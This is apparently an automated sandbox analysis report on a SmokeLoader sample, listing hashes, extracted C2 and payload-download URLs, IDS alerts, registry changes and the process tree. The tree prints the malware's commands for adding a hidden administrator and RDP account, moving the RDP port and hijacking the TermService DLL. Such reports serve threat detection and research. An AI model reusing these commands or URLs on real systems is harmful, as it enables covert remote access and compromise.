Analysis
-
max time kernel
154s -
max time network
131s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 15:55
Static task
static1
Behavioral task
behavioral1
Sample
9c32bd3ba8c37a5667aae34bbc4a84a9.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
9c32bd3ba8c37a5667aae34bbc4a84a9.exe
Resource
win10-en-20211014
General
-
Target
9c32bd3ba8c37a5667aae34bbc4a84a9.exe
-
Size
340KB
-
MD5
9c32bd3ba8c37a5667aae34bbc4a84a9
-
SHA1
59df4764d50b6859ffcb1bbf660f27d2b6bf8d1c
-
SHA256
14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992
-
SHA512
cd72c85cd317db7867bd39c2d9b438751f3d1fbfd472fc3d55191f5f3f1b7727a19dc81e626b54a64acd684adc880012f03d6b9b1573f9bd00c415c6cb04cd85
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 61 3488 powershell.exe 64 3488 powershell.exe 65 3488 powershell.exe 66 3488 powershell.exe 68 3488 powershell.exe 71 3488 powershell.exe 73 3488 powershell.exe 75 3488 powershell.exe 78 3488 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
7645.exepid process 844 7645.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 2568 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2076 2076 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_00fdmmfz.f3g.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3A5.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bwfex1yq.5u3.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF2F7.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3A4.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3C5.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3C6.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
9c32bd3ba8c37a5667aae34bbc4a84a9.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c32bd3ba8c37a5667aae34bbc4a84a9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c32bd3ba8c37a5667aae34bbc4a84a9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c32bd3ba8c37a5667aae34bbc4a84a9.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0a705db740c1d701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 65 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 66 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 68 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 64 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
9c32bd3ba8c37a5667aae34bbc4a84a9.exepid process 8 9c32bd3ba8c37a5667aae34bbc4a84a9.exe 8 9c32bd3ba8c37a5667aae34bbc4a84a9.exe 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 2568 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2568 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 644 644 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
9c32bd3ba8c37a5667aae34bbc4a84a9.exepid process 8 9c32bd3ba8c37a5667aae34bbc4a84a9.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 688 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeIncreaseQuotaPrivilege 1972 powershell.exe Token: SeSecurityPrivilege 1972 powershell.exe Token: SeTakeOwnershipPrivilege 1972 powershell.exe Token: SeLoadDriverPrivilege 1972 powershell.exe Token: SeSystemProfilePrivilege 1972 powershell.exe Token: SeSystemtimePrivilege 1972 powershell.exe Token: SeProfSingleProcessPrivilege 1972 powershell.exe Token: SeIncBasePriorityPrivilege 1972 powershell.exe Token: SeCreatePagefilePrivilege 1972 powershell.exe Token: SeBackupPrivilege 1972 powershell.exe Token: SeRestorePrivilege 1972 powershell.exe Token: SeShutdownPrivilege 1972 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeSystemEnvironmentPrivilege 1972 powershell.exe Token: SeRemoteShutdownPrivilege 1972 powershell.exe Token: SeUndockPrivilege 1972 powershell.exe Token: SeManageVolumePrivilege 1972 powershell.exe Token: 33 1972 powershell.exe Token: 34 1972 powershell.exe Token: 35 1972 powershell.exe Token: 36 1972 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe Token: 36 2736 powershell.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeIncreaseQuotaPrivilege 820 powershell.exe Token: SeSecurityPrivilege 820 powershell.exe Token: SeTakeOwnershipPrivilege 820 powershell.exe Token: SeLoadDriverPrivilege 820 powershell.exe Token: SeSystemProfilePrivilege 820 powershell.exe Token: SeSystemtimePrivilege 820 powershell.exe Token: SeProfSingleProcessPrivilege 820 powershell.exe Token: SeIncBasePriorityPrivilege 820 powershell.exe Token: SeCreatePagefilePrivilege 820 powershell.exe Token: SeBackupPrivilege 820 powershell.exe Token: SeRestorePrivilege 820 powershell.exe Token: SeShutdownPrivilege 820 powershell.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeSystemEnvironmentPrivilege 820 powershell.exe Token: SeRemoteShutdownPrivilege 820 powershell.exe Token: SeUndockPrivilege 820 powershell.exe Token: SeManageVolumePrivilege 820 powershell.exe Token: 33 820 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 2568 2568 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 2568 2568 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7645.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 2568 wrote to memory of 844 2568 7645.exe PID 2568 wrote to memory of 844 2568 7645.exe PID 844 wrote to memory of 688 844 7645.exe powershell.exe PID 844 wrote to memory of 688 844 7645.exe powershell.exe PID 688 wrote to memory of 3488 688 powershell.exe csc.exe PID 688 wrote to memory of 3488 688 powershell.exe csc.exe PID 3488 wrote to memory of 2556 3488 csc.exe cvtres.exe PID 3488 wrote to memory of 2556 3488 csc.exe cvtres.exe PID 688 wrote to memory of 1972 688 powershell.exe powershell.exe PID 688 wrote to memory of 1972 688 powershell.exe powershell.exe PID 688 wrote to memory of 2736 688 powershell.exe powershell.exe PID 688 wrote to memory of 2736 688 powershell.exe powershell.exe PID 688 wrote to memory of 820 688 powershell.exe powershell.exe PID 688 wrote to memory of 820 688 powershell.exe powershell.exe PID 688 wrote to memory of 3044 688 powershell.exe reg.exe PID 688 wrote to memory of 3044 688 powershell.exe reg.exe PID 688 wrote to memory of 1556 688 powershell.exe reg.exe PID 688 wrote to memory of 1556 688 powershell.exe reg.exe PID 688 wrote to memory of 3708 688 powershell.exe reg.exe PID 688 wrote to memory of 3708 688 powershell.exe reg.exe PID 688 wrote to memory of 2380 688 powershell.exe net.exe PID 688 wrote to memory of 2380 688 powershell.exe net.exe PID 2380 wrote to memory of 3804 2380 net.exe net1.exe PID 2380 wrote to memory of 3804 2380 net.exe net1.exe PID 688 wrote to memory of 2868 688 powershell.exe cmd.exe PID 688 wrote to memory of 2868 688 powershell.exe cmd.exe PID 2868 wrote to memory of 2240 2868 cmd.exe cmd.exe PID 2868 wrote to memory of 2240 2868 cmd.exe cmd.exe PID 2240 wrote to memory of 1664 2240 cmd.exe net.exe PID 2240 wrote to memory of 1664 2240 cmd.exe net.exe PID 1664 wrote to memory of 1900 1664 net.exe net1.exe PID 1664 wrote to memory of 1900 1664 net.exe net1.exe PID 688 wrote to memory of 3288 688 powershell.exe cmd.exe PID 688 wrote to memory of 3288 688 powershell.exe cmd.exe PID 3288 wrote to memory of 3612 3288 cmd.exe cmd.exe PID 3288 wrote to memory of 3612 3288 cmd.exe cmd.exe PID 3612 wrote to memory of 2468 3612 cmd.exe net.exe PID 3612 wrote to memory of 2468 3612 cmd.exe net.exe PID 2468 wrote to memory of 3864 2468 net.exe net1.exe PID 2468 wrote to memory of 3864 2468 net.exe net1.exe PID 3756 wrote to memory of 2084 3756 cmd.exe net.exe PID 3756 wrote to memory of 2084 3756 cmd.exe net.exe PID 2084 wrote to memory of 1724 2084 net.exe net1.exe PID 2084 wrote to memory of 1724 2084 net.exe net1.exe PID 2736 wrote to memory of 2232 2736 cmd.exe net.exe PID 2736 wrote to memory of 2232 2736 cmd.exe net.exe PID 2232 wrote to memory of 1008 2232 net.exe net1.exe PID 2232 wrote to memory of 1008 2232 net.exe net1.exe PID 2840 wrote to memory of 3292 2840 cmd.exe net.exe PID 2840 wrote to memory of 3292 2840 cmd.exe net.exe PID 3292 wrote to memory of 3236 3292 net.exe net1.exe PID 3292 wrote to memory of 3236 3292 net.exe net1.exe PID 1540 wrote to memory of 4008 1540 cmd.exe net.exe PID 1540 wrote to memory of 4008 1540 cmd.exe net.exe PID 4008 wrote to memory of 2588 4008 net.exe net1.exe PID 4008 wrote to memory of 2588 4008 net.exe net1.exe PID 2204 wrote to memory of 2244 2204 cmd.exe net.exe PID 2204 wrote to memory of 2244 2204 cmd.exe net.exe PID 2244 wrote to memory of 3828 2244 net.exe net1.exe PID 2244 wrote to memory of 3828 2244 net.exe net1.exe PID 2760 wrote to memory of 1056 2760 cmd.exe net.exe PID 2760 wrote to memory of 1056 2760 cmd.exe net.exe PID 1056 wrote to memory of 1680 1056 net.exe net1.exe PID 1056 wrote to memory of 1680 1056 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c32bd3ba8c37a5667aae34bbc4a84a9.exe"C:\Users\Admin\AppData\Local\Temp\9c32bd3ba8c37a5667aae34bbc4a84a9.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7645.exeC:\Users\Admin\AppData\Local\Temp\7645.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EEE.tmp" "c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\CSCEB3CB7ED157E4EF6836E44E436CC1C4F.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc oCFzRLfU /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc oCFzRLfU /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc oCFzRLfU /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc oCFzRLfU1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc oCFzRLfU2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc oCFzRLfU3⤵
-
